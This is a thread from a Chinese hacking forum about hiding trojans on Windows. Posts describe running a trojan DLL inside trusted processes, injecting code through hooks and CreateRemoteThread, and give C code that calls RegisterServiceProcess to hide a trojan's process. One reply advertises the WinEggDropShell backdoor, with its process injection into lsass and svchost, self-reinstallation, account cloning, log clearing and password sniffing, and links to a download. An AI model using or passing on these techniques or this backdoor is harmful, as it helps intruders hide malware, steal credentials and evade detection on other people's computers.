论坛: 黑客进阶 标题: 木马的隐藏技术!!!! 复制本贴地址    
作者: 村野山人 [chiruwn]    论坛用户   登录
木马的隐藏技术:
在win9x 下隐藏进程只需把进程注册为系统服务即可。

这次我们主要谈谈如何在win 2k下隐藏木马。

1. 动态链接库
动态链接库,DLL(Dynamic Link Library)DLL文件是windows的基础,因为所有的API函数都是在DLL中实现的,DLL文件没有程序逻辑,是由多个功能函数构成,它们并不能独立运行,一般都是进程加载并调用的,所以在进程列表中并不会出现DLL,我们的做法就是编写一个木马DLL,并且通过别的进程来运行它,如果那个进程是可信进程,(例如:资源管理器等)那么我们编写的木马DLL作为进程的一部分也将被信赖。
2. 动态嵌入技术
动态嵌入技术是指将自己的代码嵌入已在运行的进程中的技术。理论上来说,在windows中的每一个进程都有自己的私有的内存空间,别的进程不容许对这个私有的空间进行操作,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存,例如:窗口hook,挂接API,远程线程等。


累死我了!!!!!!!!


地主 发表时间: 02/24 15:05

回复: 村野山人 [chiruwn]   论坛用户   登录
接着我们谈一谈如何在win 9x 下隐藏进程:
在win9x 下隐藏进程只需要把木马程序注册为“系统服务”。详见下面的示范代码:

int(CALLBACK *hide)(DWORD,DWORD);
hide=(int(CALLBACK *)(DWORD,DWORD))GetProcAddress(dll,”RegisterServiceProcess”);
//获得RegisterServiceProcess的入口地址
hide(NULL,1);
//调用RegisterServiceProces,把程序注册为系统服务

这样在win9 下按Ctrl+Alt+Del时就看不见木马的进程了,但是这个并不适合win NT/2000。


B1层 发表时间: 02/25 17:11

回复: 村野山人 [chiruwn]   论坛用户   登录
接下来再详细说一下动态嵌入技术的远程线程技术:
     所谓远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。在进程中可以通过Create Thread函数创建线程,被创建的新线程与住线程(就是进程启动时被自动创建的那个)共享地址空间以及其它的资源。(!!题外话:还有通过CreateRemoteThread同样可以在另一个进程中创建线程,就是知道的人不是很多)我们通过一个远程线程,进入了远程进程的地址空间,实际上我们就拥有了那个远程进程相当的权限。
      快要下班了,饿死了,下回会举个这样的例子。改天见!!(大家吃好喝好!)


B2层 发表时间: 03/05 17:03

回复: wineggdrop [wineggdrop]   论坛用户   登录
WinEggDropShell V1.38 
后门特色: 
1.插入到你配置的进程中去运行,lsass,svchost,smss等进程都能插入. 
2.用户可以自定义密码,端口等,密码是以md5的checksum保存,就算服务器被人得到,一样 
很难得到密码. 
3.后门打开两个线程,一个接收用户的连接,另一个定时检测启动后门的服务是否有被删除, 
一旦发现服务被删除,会自动生成一样以达到重启后再启动后门程序。 
4.按功能和后门(TBack.Dll)的大小比较的话,后门程序尚算小型,当然没有V1.36或低于V1.36 
版本的服务器小,但那些版本是以一个可执行文件安装为服务执行的(小于30k). 
5.有些功能是其它的后门所没有的,例如克隆帐户,在server版的win 2k中安装终端服务(一个 
命令+重启就完成),删除日志,恢复系统几个常用文件关联,激活或禁止TCP/IP过滤等. 
6.比较完好的在线帮助,用户可以使用命令Help得到所有命令的语法规则(以字母顺序排序显示), 
对于带参数的命令,只要输入命令,就会在线显示那个命令的语法规则,并带有一个列子,例 
如用户想用克隆帐户的命令,只记得命令是Clone,参数是怎样的忘记了,用户只要输入Clone, 
就可以得到以下帮助: 
Usage: Clone AdminAccount Guest Password 
Example: Clone Administrator Guest 12345 
7.端口重用功能,对于一般应用程序打开的端口,后门可以强行再绑入,对于系统服务打开的端 
口,不一定可以强行绑入,正确来说是有些可以强行绑入,有些就不行。 

使用前先好好看一下EditServerReadme.txt,如何配置后门以及要注意些什么的事项,都在那个说 
明文件。详细的命令说明就请看Readme.txt 


功能如下 
1.Pslist 功能说明:显示进程 
2.ListIp 功能说明:显示系统所有IP和域名 
3.ShowSID 功能说明:显示所有系统帐户的SID(读注册表中sam下的值得到) 
4.Fport 功能说明:进程打开的端口列表 
5.Online 功能说明:列出所有连接进去这个后门的用户的IP 
6.WhoIsShell 功能说明:列出哪个IP得到一个shell 
7.ShowName 功能说明:显示所有系统帐户(通过读注册表,可以显示到隐藏帐户) 
8.Reboot 功能说明:重启那台系统 
9.ShutDown 功能说明:关闭那台系统 
10.Logoff 功能说明:注销登陆了的帐户 
11.PowerOff 功能说明:关那系统电源 
12.Shell 功能说明:得到一个Shell 
13.Stopbackdoor 功能说明:停止wineggdropshell服务 
14.pskill 功能说明:杀进程 
15.Never 功能说明:设置某个帐户使其的登陆时间被改为从无登陆以及 
登陆次数为0 
16.Dir 功能说明:显示当前目录文件 
17.Del 功能说明:删除文件 
18.Execute 功能说明:执行程序 
19.Http://IP/文件 功能说明:下载文件 
20.Installterm 功能说明:安装终端服务 
21.Clone 功能说明:克隆一个系统帐户 
22.Send 功能说明:给其它连接上wineggdropshell的用户发信息 
23.Exit 功能说明:断开连接 
24.OffShell 功能说明:将得到Shell的用户踢下去 
25.Help 功能说明:显示命令说明 
26.Disconnect 功能说明:将其它用户踢下线去 
27.StopService 功能:停止系统的某个服务 
28.StartService 功能:启动系统某个服务 
29.DeleteService 功能:删除系统某个服务 
30.CleanEvent 功能说明:清除系统日志 
31.TerminalPort 功能说明:查看或重新设置终端服务端口 
32.Redirect 功能说明:TCP数据转发 
33.ViewThreads 功能说明:查看TCP数据转发打开的线程 
34.KillThreads 功能说明:杀掉某个TCP数据转发的线程 
35.EnableFilter 功能说明:激活TCP/IP过滤 
36.DisableFilter 功能说明:禁止TCP/IP过滤 
37.FilterInfo 功能说明:查看TCP/IP过滤是处于激活还是禁止状态 
38.AR 功能说明:恢复系统几个常用的关联的设置 
39.GetUser 功能说明:列举系统所有帐户 
40.ViewPath 功能说明:查看当前目录 
41.SetPath 功能说明:设置当前目录 
42.SID 功能说明:查看本地或远程系统帐户的SID 
43.ViewTimeOut 功能说明:查看超时秒数 
44.SetTimeOut 功能说明:设置超时秒数 
45.StartSniffer 功能说明:启动嗅觉密码功能 
46.StopSniffer 功能说明:停止嗅觉功能 
47.ViewSniffer 功能说明:查看嗅觉密码功能是否在进行 
48.Sysinfo 功能说明:查看系统的信息 
49.ViewService 功能说明:查看某个服务的状态 
50.ConfigService 功能说明:修改某个服务的启动状态 
详细的命令用法请看最后的命令说明 


下载:  http://dns2.dns2pc.com/down/show.asp?id=280 
211.93.112.71/WinEggDropShell.zip 


B3层 发表时间: 03/08 15:09

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号